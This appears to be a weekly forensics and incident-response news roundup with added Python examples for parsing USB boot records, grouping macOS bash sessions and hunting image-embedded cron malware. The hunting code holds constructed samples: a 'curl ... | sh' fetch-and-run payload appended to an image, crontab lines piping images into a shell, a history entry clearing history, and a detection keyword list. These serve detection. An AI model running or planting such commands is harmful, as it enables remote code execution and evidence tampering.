FORENSIC ANALYSIS
- Matt at ‘Bit of Hex’ takes a look at the memory artefacts left behind by “a user running Tor Browser Bundle (TBB) on an external USB drive to access webmail, and a Tor hidden service.”
  Memory Forensics & Tor
- Igor and Oleg at Cyber Forensicator examine the artefacts created by the “pCloud desktop application – pCloud Drive”.
  Cloud Forensics: pCloud Drive
- Brian Carrier at Cyber Triage demonstrates how to use Volatility within Cyber Triage to examine memory images.
  Using Volatility in Cyber Triage to Analyze Memory
- Oleg Skulkin and Igor Mikhaylov at Digital Forensics Corp demonstrate the new Volatility integration in Magnet Forensics’ AXIOM.
  AXIOM V2: MEMORY FORENSICS
- Jason Hale at Digital Forensics Stream examines the Microsoft-Windows-Partition/Diagnostic event log found on Windows 10 systems with respect to USB device tracking. Jason shows that Event ID 1006 contains not only the manufacturer, model, and serial number, but also the “volume boot record of a device that was connected to the system”.
  USB Device Tracking using the Partition/Diagnostic Event Log
- Gary at Salt Forensics shares some initial testing of the new Windows 10 Timeline feature.
  Windows 10 Timeline – Initial Review of Forensic Artefacts
- SANS updated the Windows Forensic Analysis poster.
  Check out @chadtilbury’s Tweet
- Andrea Fortuna at ‘So Long, and Thanks for All the Fish’ describes the basics of file carving and shares some resources on the topic.
  Some thought about file carving
- The Forensicator shares a metadata analysis of some of the Word documents shared by Guccifer 2.
  Did Guccifer 2 Plant his Russian Fingerprints?
- Yogesh Khatri at Swift Forensics describes the bash session files found on macOS since 10.11 (El Capitan). These look super useful compared to the standard bash history, which can get a bit confusing if a user has multiple terminal windows open at once.
  Bash sessions in macOS (and why you need to understand its working)
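The reason the VBR in Jason Hale's Event ID 1006 finding matters is that the first sector of a volume carries the file system type, cluster geometry and, above all, the volume serial number, which is the same value recorded in LNK files and other volume-aware artefacts. The following parser is an added example, not code from Jason's post: it assumes the VBR is copied out of the event's binary data field (assumed here to be named Vbr0) as the hex string shown in Event Viewer's XML view, and both sample sectors are constructed rather than taken from any real device.

```python
"""Parse the volume boot record (VBR) carried in a Partition/Diagnostic Event ID
1006 record so the device's file system, volume serial and label can be matched
against LNK files, shellbags and other volume-serial-bearing artefacts.
Added example; not code from Jason Hale's post.

Assumptions: the VBR is taken from the event's binary data field (assumed to be
named Vbr0) as the hex string shown in the XML view of Event Viewer, and only
the first 512 bytes are needed. The two sample sectors below are constructed."""
import struct
from typing import Any, Dict


def parse_vbr(vbr: bytes) -> Dict[str, Any]:
    """Identify NTFS, exFAT, FAT32 or FAT12/16 from the BIOS Parameter Block."""
    if len(vbr) < 512:
        raise ValueError("need at least 512 bytes of boot sector")
    oem = vbr[3:11]
    info: Dict[str, Any] = {"oem": oem.decode("ascii", "replace").rstrip()}
    if vbr[510:512] != b"\x55\xaa":
        info["warning"] = "0x55AA signature missing; may not be a boot sector"
    if oem == b"NTFS    ":
        bps, spc = struct.unpack_from("<HB", vbr, 0x0B)
        total, = struct.unpack_from("<Q", vbr, 0x28)
        serial, = struct.unpack_from("<Q", vbr, 0x48)
        info.update(fs="NTFS", bytes_per_sector=bps, sectors_per_cluster=spc,
                    total_sectors=total, volume_serial=f"{serial:016X}")
    elif oem == b"EXFAT   ":
        # exFAT stores sizes as power-of-two shifts rather than raw counts
        total, = struct.unpack_from("<Q", vbr, 0x48)
        serial, = struct.unpack_from("<I", vbr, 0x64)
        info.update(fs="exFAT", bytes_per_sector=1 << vbr[0x6C],
                    sectors_per_cluster=1 << vbr[0x6D], total_sectors=total,
                    volume_serial=f"{serial:08X}")
    else:
        bps, spc = struct.unpack_from("<HB", vbr, 0x0B)
        total16, = struct.unpack_from("<H", vbr, 0x13)
        total32, = struct.unpack_from("<I", vbr, 0x20)
        if vbr[0x52:0x5A].startswith(b"FAT32"):
            serial, = struct.unpack_from("<I", vbr, 0x43)
            label, fs = vbr[0x47:0x52], "FAT32"
        else:  # FAT12/FAT16 extended BPB
            serial, = struct.unpack_from("<I", vbr, 0x27)
            label = vbr[0x2B:0x36]
            fs = vbr[0x36:0x3E].decode("ascii", "replace").strip() or "FAT"
        info.update(fs=fs, bytes_per_sector=bps, sectors_per_cluster=spc,
                    total_sectors=total16 or total32,
                    # same XXXX-XXXX form that `dir` and LNK parsers display
                    volume_serial=f"{serial >> 16:04X}-{serial & 0xFFFF:04X}",
                    volume_label=label.decode("ascii", "replace").rstrip())
    return info


def parse_vbr_hex(hex_field: str) -> Dict[str, Any]:
    """Accept the hex string as copied from the event's XML view (spaces allowed)."""
    return parse_vbr(bytes.fromhex("".join(hex_field.split())))


def constructed_fat32_vbr() -> bytes:
    """Constructed FAT32 boot sector for the example (not from a real device)."""
    sec = bytearray(512)
    sec[0:3] = b"\xEB\x58\x90"
    sec[3:11] = b"MSDOS5.0"
    struct.pack_into("<HB", sec, 0x0B, 512, 8)        # 512 bytes/sector, 8 sectors/cluster
    struct.pack_into("<I", sec, 0x20, 15646720)       # total sectors (roughly a 7.5 GB stick)
    struct.pack_into("<I", sec, 0x43, 0x1A2B3C4D)     # volume serial
    sec[0x47:0x52] = b"USBSTICK   "                   # 11-byte label
    sec[0x52:0x5A] = b"FAT32   "
    sec[510:512] = b"\x55\xAA"
    return bytes(sec)


def constructed_ntfs_vbr() -> bytes:
    """Constructed NTFS boot sector for the example (not from a real device)."""
    sec = bytearray(512)
    sec[0:3] = b"\xEB\x52\x90"
    sec[3:11] = b"NTFS    "
    struct.pack_into("<HB", sec, 0x0B, 512, 8)
    struct.pack_into("<Q", sec, 0x28, 62533631)       # total sectors
    struct.pack_into("<Q", sec, 0x48, 0x8C2A4F0E1D3B6A57)
    sec[510:512] = b"\x55\xAA"
    return bytes(sec)


if __name__ == "__main__":
    for sector in (constructed_fat32_vbr(), constructed_ntfs_vbr()):
        print(parse_vbr_hex(sector.hex()))
```

The FAT serial is printed in the XXXX-XXXX form so it can be grepped straight against the volume serial that LNK parsers report; for NTFS the full 64-bit serial is kept, since LNK files store only its low 32 bits.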
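To show why the per-session files are easier to reason about than a single interleaved .bash_history, here is an added example (not code from Yogesh Khatri's post) that groups a .bash_sessions directory by session ID. It assumes the layout written by Apple's /etc/bashrc_Apple_Terminal on 10.11 and later: <id>.history holds a session's saved commands, <id>.historynew holds commands not yet merged into that file (the merge is assumed to happen when the session ends), and <id>.session, when present, carries an "echo Restored session: <date>" line. The sample directory contents are constructed.

```python
"""Group macOS Terminal command history per session. Added example; not code
from Yogesh Khatri's post. Assumed on-disk layout (Apple's
/etc/bashrc_Apple_Terminal, 10.11+): ~/.bash_sessions/<id>.history holds a
session's saved commands, <id>.historynew holds commands not yet merged into
it (assumed to be merged at session end), and <id>.session, when present,
contains an 'echo Restored session: <date>' line. Sample data is constructed."""
import os
import re
from typing import Dict, List

RESTORED_RE = re.compile(r"Restored session:\s*(.+?)\s*$")
SESSION_EXTS = ("history", "historynew", "session")


def parse_sessions(files: Dict[str, str]) -> Dict[str, dict]:
    """files maps a file name inside .bash_sessions to its text content."""
    sessions: Dict[str, dict] = {}
    for name in sorted(files):
        base, dot, ext = name.rpartition(".")
        if not dot or ext not in SESSION_EXTS:
            continue
        s = sessions.setdefault(base, {"commands": [], "unmerged": [], "restored": None})
        lines = [ln for ln in files[name].splitlines() if ln.strip()]
        if ext == "history":
            s["commands"].extend(lines)
        elif ext == "historynew":
            s["unmerged"].extend(lines)   # seen in this session, not yet in .history
        else:
            for ln in lines:
                m = RESTORED_RE.search(ln)
                if m:
                    s["restored"] = m.group(1)
    return sessions


def load_sessions_dir(path: str) -> Dict[str, dict]:
    """Read a real .bash_sessions directory, e.g. one exported from an image."""
    files = {}
    for name in os.listdir(path):
        full = os.path.join(path, name)
        if os.path.isfile(full):
            with open(full, encoding="utf-8", errors="replace") as fh:
                files[name] = fh.read()
    return parse_sessions(files)


def sessions_with_unmerged(sessions: Dict[str, dict]) -> List[str]:
    """Session IDs whose .historynew still holds commands: under the assumption
    above these never reached .history, so a plain history review misses them."""
    return [sid for sid, s in sessions.items() if s["unmerged"]]


# Constructed sample directory; the UUIDs and commands are made up for the example.
CONSTRUCTED_DIR = {
    "2F7A1C3E-0000-4000-8000-000000000001.history":
        "cd ~/Downloads\ncurl -O http://198.51.100.7/setup.sh\nchmod +x setup.sh\n",
    "2F7A1C3E-0000-4000-8000-000000000001.session":
        "echo Restored session: Thu May  3 09:12:41 BST 2018\n",
    "2F7A1C3E-0000-4000-8000-000000000002.history": "ls -la\n",
    "2F7A1C3E-0000-4000-8000-000000000002.historynew": "./setup.sh\n",
    "2F7A1C3E-0000-4000-8000-000000000002.session":
        "echo Restored session: Thu May  3 09:40:05 BST 2018\n",
    "2F7A1C3E-0000-4000-8000-000000000003.historynew": "history -c\n",
    "not_a_session.txt": "ignored\n",
}


if __name__ == "__main__":
    for sid, s in parse_sessions(CONSTRUCTED_DIR).items():
        print(sid, s["restored"], s["commands"], "unmerged:", s["unmerged"])
    print("sessions with unmerged commands:", sessions_with_unmerged(parse_sessions(CONSTRUCTED_DIR)))
```

Point load_sessions_dir at a copied-out .bash_sessions directory to get the same grouping for a real user; the constructed dictionary only stands in for that directory so the example runs offline.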
THREAT INTELLIGENCE/HUNTING
- There’s a post on the Cloudy Forensics blog about detecting attacks using disk forensic techniques, based on MITRE’s ATT&CK framework.
  Forensic detection of MITRE ATT&CK Techniques
- Adam at Hexacorn shows how to sideload a DLL by modifying a registry key associated with the Windows Address Book.
  wab.exe as a LOLBin
- Tom Hegel at 401 TRG describes some recent attacks by Winnti Umbrella and its ties with the Chinese state intelligence apparatus.
  Burning Umbrella: An Intelligence Report on the Winnti Umbrella and Associated State-Sponsored Attackers
- Colin at Red Flare Security describes some tools to simulate adversary attacks, as well as some common techniques that adversaries use on a system or network.
  Simulating Advanced Persistent Threat Group Activity
- Pablo Delgado at Syspanda posted a few times this week.
  - The first shows how to “pull up-to-date threat events from your [McAfee] ePO database server into Elasticsearch from a Windows System”.
    Importing McAfee ePO Threat events to ELK
  - The second shows how to configure ELK to display login activity.
    Monitoring Active Directory with ELK
  - The last shows how to label endpoints with Logstash to make “it much easier to identify abnormal behavior”.
    Labeling endpoint actions with Logstash – Threat Hunting
UPCOMING WEBINARS/CONFERENCES
- Yuri Gubanov at Belkasoft is hosting a webinar on Instant Messenger Forensics on May 8. “The webinar will cover several most popular messengers like WhatsApp, Telegram, SnapChat and Skype. We will also discuss SQLite and RAM forensics and review how Belkasoft Evidence Center (BEC) can help you with chat forensics.”
  Belkasoft Webinar Registration
- Joshua James at Digital Forensic Science advises that the CFP for ICDF2C 2018 has been extended.
  ICDF2C 2018 Extended Call for Papers
PRESENTATIONS/PODCASTS
- BlackBag Technologies showcase Windows memory analysis using BlackLight.
  Windows RAM Analysis
- Michael and Brian hosted Lesley Carhart on the Brakeing Down Incident Response podcast.
  BDIR Episode – 003
- Sarah Edwards shared her slides from her recent BSides Baltimore presentation titled “Getting Saucy with APFS”.
  Getting Saucy with APFS
- Joshua James at Digital Forensic Science demonstrates “how to do in-place file hash comparison from a disk image” using The Sleuth Kit and CoreUtils. Joshua also posted a video on how to bulk hash search with The Sleuth Kit’s hfind.
  In-place Hash Comparison with Sleuthkit and CoreUtils on Windows
- Matt Shannon at F-Response shares a video showing how to access a BitLocker-encrypted drive remotely using F-Response and dislocker.
  Accessing a remote Bitlocker volume thanks to F-Response and Dislocker
- Marcos at ‘Follow The White Rabbit’ shared his (Spanish) presentation slides from CONPilar18 on USB device forensics.
  #DFIR: Piénsatelo dos veces antes de meterla – (Gracias, @CONPilarZgz) (roughly, “Think twice before plugging it in”)
- Dave and Matthew hosted Maxime Lamothe-Brassard and Nicole Ibrahim on the Forensic Lunch. Nicole discussed her research into ETL files, which she’ll be presenting at the DFIR Summit, and Maxime showcased LimaCharlie.
  Forensic Lunch: 5/4/18
- OALabs have uploaded a video showing how to use “the IDA Pro debugger and some API hooks to unpack a Visual Basic (VB6) packed sample”.
  Unpacking VB6 Packers With IDA Pro and API Hooks (Re-Upload)
- On this week’s Digital Forensic Survival Podcast, Michael talked about his go-to prefetch parsing tools.
  DFSP # 115 – Prefetch Tools
- Richard Davis at 13Cubed shows how to parse Event Logs using Microsoft Log Parser.
  Event Log Forensics with Log Parser
- SANS shared Rebekah Brown’s presentation from the 2018 CTI Summit titled “Information Anarchy: A Survival Guide for the Misinformation Age”.
  Information Anarchy: A Survival Guide for the Misinformation Age – SANS CTI Summit 2018
- Didier Stevens was interviewed on the InfoSec Campus SecTools podcast.
  SecTools E02 with Didier Stevens
- I recorded my ‘this month in 4n6’ podcast for April.
  This Month In 4n6 – April – 2018
MALWARE
- Arbor’s Security Engineering & Response Team provide details of some recent attacks linked to Fancy Bear using the LoJack agent.
  Lojack Becomes a Double-Agent
- Check Point Research share some information about an active crypto-mining operation distributing CryptoNote and XMRig.
  A Crypto Mining Operation Unmasked
- Nadav Avital, Matan Lion, and Ron Masas at Incapsula describe a “cryptojacking technique [where the attackers have distributed] the mining effort beyond the targeted web application servers and internal network and reaching future visitors of the attacked web applications.”
  Crypto Me0wing Attacks: Kitty Cashes in on Monero
- There were a couple of posts on the Malwarebytes Labs blog this week.
  - Vasilios Hioureas examines a sample of the Spartacus ransomware.
    Spartacus ransomware: introduction to a strain of unsophisticated malware
  - They also wrote an article about the use of malicious Internet shortcut (URL) files by the Necurs botnet.
    Internet Shortcut used in Necurs malspam campaign
- Yanhui Jia, Matt Tennis, Yi Ren and Rongbo Shao at Palo Alto Networks show the effects of the PoC drupalgeddon2 code exploiting CVE-2018-7600.
  Exploit in the Wild: #drupalgeddon2 – Analysis of CVE-2018-7600
- Sandfly Security describe “a clever use of default system commands to embed a covert channel malicious script inside a file that looks like an ordinary jpg or png file at first glance.”
  Linux Malware Persistence with Cron
- There were a couple of posts on the SANS Internet Storm Center Handler Diaries this week.
  - Xavier Mertens shares a maldoc generator found on Pastebin.
    Diving into a Simple Maldoc Generator, (Tue, May 1st)
  - Renato Marinho examines a sample exploiting CVE-2018-2628.
    WebLogic Exploited in the Wild (Again), (Thu, May 3rd)
- There were a couple of posts on the TrendLabs blog this week.
  - Joseph C Chen examines the FacexWorm Chrome extension.
    FacexWorm Targets Cryptocurrency Trading Platforms, Abuses Facebook Messenger for Propagation
  - They also examine a sample of the Blackheart ransomware, “which drops and executes the legitimate tool known as AnyDesk alongside its malicious payload”.
    Legitimate Application AnyDesk Bundled with New Ransomware Variant
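A hunting check for the Sandfly item above, as an added example that is neither Sandfly's code nor necessarily their exact mechanism: it assumes the script text sits after the image's structural end (the PNG IEND chunk or the JPEG EOI marker) or inside an ancillary PNG chunk, and that a crontab line later hands the file to sh or bash. Walking the PNG chunk list and locating the real JPEG EOI is what lets the check distinguish a file that merely starts with an image header from a genuine image; the sample image bytes, payload and crontab are all constructed.

```python
"""Hunt for a shell script hidden behind an image header and for the cron
entry that would run it. Added example; not Sandfly's code and not
necessarily their exact technique. Assumptions: the script text sits after
the image's structural end (PNG IEND chunk, JPEG EOI marker) or inside an
ancillary PNG chunk, and a crontab line later feeds the file to sh/bash.
The sample image bytes, payload and crontab below are constructed."""
import re
import struct
import zlib
from typing import List, Tuple

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
JPEG_MAGIC = b"\xff\xd8\xff"
SCRIPT_HINTS = (b"#!/", b"/bin/sh", b"/bin/bash", b"bash -c", b"curl ",
                b"wget ", b"base64 -d", b"/dev/tcp/", b"nohup ", b"chmod +x")


def has_script(blob: bytes) -> bool:
    return any(hint in blob for hint in SCRIPT_HINTS)


def find_hidden_script(data: bytes) -> List[Tuple[str, bytes]]:
    """Return (location, payload) pairs; an empty list means nothing found."""
    findings: List[Tuple[str, bytes]] = []
    if data.startswith(PNG_MAGIC):
        pos, end = len(PNG_MAGIC), None
        while pos + 8 <= len(data):
            length, ctype = struct.unpack_from(">I4s", data, pos)
            body = data[pos + 8:pos + 8 + length]
            if ctype != b"IDAT" and has_script(body):   # tEXt/zTXt/private chunk
                findings.append((f"PNG chunk {ctype.decode('ascii', 'replace')}", body))
            pos += 12 + length                            # length + type + data + CRC
            if ctype == b"IEND":
                end = pos
                break
        if end is not None and has_script(data[end:]):
            findings.append(("after IEND", data[end:]))
    elif data.startswith(JPEG_MAGIC):
        # 0xFF inside entropy-coded data is byte-stuffed, so the last FFD9
        # is the real end-of-image marker (embedded EXIF thumbnails have their own)
        eoi = data.rfind(b"\xff\xd9")
        if eoi != -1 and has_script(data[eoi + 2:]):
            findings.append(("after EOI", data[eoi + 2:]))
    return findings


# crontab lines that pipe an image file into a shell, or hand it to a shell directly
CRON_IMAGE_RE = re.compile(
    r"\S+\.(?:jpe?g|png|gif)\b.*\|\s*(?:ba)?sh\b|(?:ba)?sh\s+\S+\.(?:jpe?g|png|gif)\b")


def suspicious_cron_lines(crontab: str) -> List[str]:
    hits = []
    for line in crontab.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and CRON_IMAGE_RE.search(line):
            hits.append(line)
    return hits


# --- constructed samples (TEST-NET-2 address; nothing here is real) ---------
PAYLOAD = b"#!/bin/sh\ncurl -s http://198.51.100.7/x | sh\n"


def _png_chunk(ctype: bytes, body: bytes) -> bytes:
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))


def constructed_png(trailer: bytes = b"", text_chunk: bytes = b"") -> bytes:
    """1x1 greyscale PNG, optionally with a payload in a tEXt chunk or after IEND."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    chunks = [_png_chunk(b"IHDR", ihdr)]
    if text_chunk:
        chunks.append(_png_chunk(b"tEXt", b"Comment\x00" + text_chunk))
    chunks += [_png_chunk(b"IDAT", zlib.compress(b"\x00\x00")), _png_chunk(b"IEND", b"")]
    return PNG_MAGIC + b"".join(chunks) + trailer


def constructed_jpeg(trailer: bytes = b"") -> bytes:
    """Minimal JFIF header plus EOI; enough structure for the check above."""
    app0 = b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    return b"\xff\xd8" + app0 + b"\xff\xd9" + trailer


CONSTRUCTED_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/find /var/www/uploads -name '*.jpg' -mtime +30 -delete
*/5 * * * * tail -n +2 /var/tmp/.cache/photo.jpg | sh
@reboot bash /usr/share/pixmaps/.logo.png
"""


if __name__ == "__main__":
    print(find_hidden_script(constructed_png(trailer=PAYLOAD)))
    print(find_hidden_script(constructed_jpeg(PAYLOAD)))
    print(suspicious_cron_lines(CONSTRUCTED_CRONTAB))
```

On a live system the same two functions would be run over the files referenced by every crontab, /etc/cron.d entry and systemd timer, and over any image file under world-writable or dot-prefixed directories; the cron regex is deliberately narrow and will not catch a loader that copies the image somewhere else before executing it.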
MISCELLANEOUS
- Alexis Brignoni has started a new blog translating DFIR articles into Spanish for those that need it. He has put out a call to the community to contribute articles and hopefully can help readers build up their capabilities.
  Check out @AlexisBrignoni’s Tweet!
- Ashley Hernandez at BlackBag Technologies demonstrates how to use the “Gray to Black” application “to prepare a GrayKey zip for ingestion into BlackLight or Mobilyze.”
  Gray To Black: Analyzing Graykey Images In Blacklight Or Mobilyze
- There were a couple of posts on the CCL blog this week.
  - Richard Walker commented on a recent examination that they had conducted on a mobile device. Thinking out loud, it would be good to look into the different PDF viewers on iOS/Android and see which ones store recently accessed document lists.
    Mobile Device Lab – Defence Case Examination
  - Alex Caithness walks through some of the testing that has been done on the new Timeline feature in the recent Windows 10 update.
    Windows 10 Timeline Forensic Artefacts
- Brett Shavers at DFIR.Training comments on methods of identifying the right tool for your circumstances.
  The Best DFIR tools
- There’s a post on the Finding Vulnerabilities blog on how to enable logging in PowerShell 5 for Windows 7.
  Enabling Powershell 5 LOGGING for Windows 7
- Johann Hofmann at Griffeye discusses the “limitations for investigators working in silos”. He explains that “a collaborative and integrated approach that will help teams move through their cases quickly is as important as building great tools in the first place”.
  Using technology to get results: Think outside the silo
- Christa Miller at Magnet Forensics posted the answers to further questions asked about the Connections feature of AXIOM.
  Connections in Magnet AXIOM Q&A Part 2
- Scar de Courcier describes her experience with publishing a book recently and gives some advice for those looking to do the same in the future.
  Finding A Publisher For Your Book
SOFTWARE UPDATES
- Berla released iVe v2.0 and iVe Mobile v2.0. They have added support for Audi systems, as well as better integration with iVe Mobile. They also put together a few spotlights of some of the features.
- Cellebrite updated their UFED line to v7.4 to fix some bugs and update app support. The release notes aren’t online to link to.
- CRU updated their WriteBlocking Validation Utility to version 2.0.0.2.
  Download WriteBlocking Validation Utility
- Eric Zimmerman updated his Amcache parser to v1.0.0.2 and Timeline Explorer to v0.8.0.2.
  TLE and Amcache parser
- ExifTool 10.95 (development) was released with some new tags and bug fixes.
  ExifTool 10.95
- GetData updated Forensic Explorer to v4.3.5.7342 to fix a bug.
  01 May 2018 – v4.3.5.7342
- Microsystemation have released XRY 7.7.1, adding support for GrayKey extractions, as well as additional app and device decoding.
  Now released: XRY 7.7.1, plus Kiosk and Tablet 7.7.1
- Ryan Benson released Hindsight v2.2, adding “parsing of more preference items and support for newer versions of Chrome”.
  Hindsight v2.2 Released – Preference Items
- X-Ways Forensics 19.7 Preview 2b was released with a number of new improvements and bug fixes. This update also includes APFS parsing.
  X-Ways Forensics 19.7 Preview 2b
And that’s all for Week 18! If you think I’ve missed something, or want me to cover something specifically hit me up through the contact page or on the social pipes!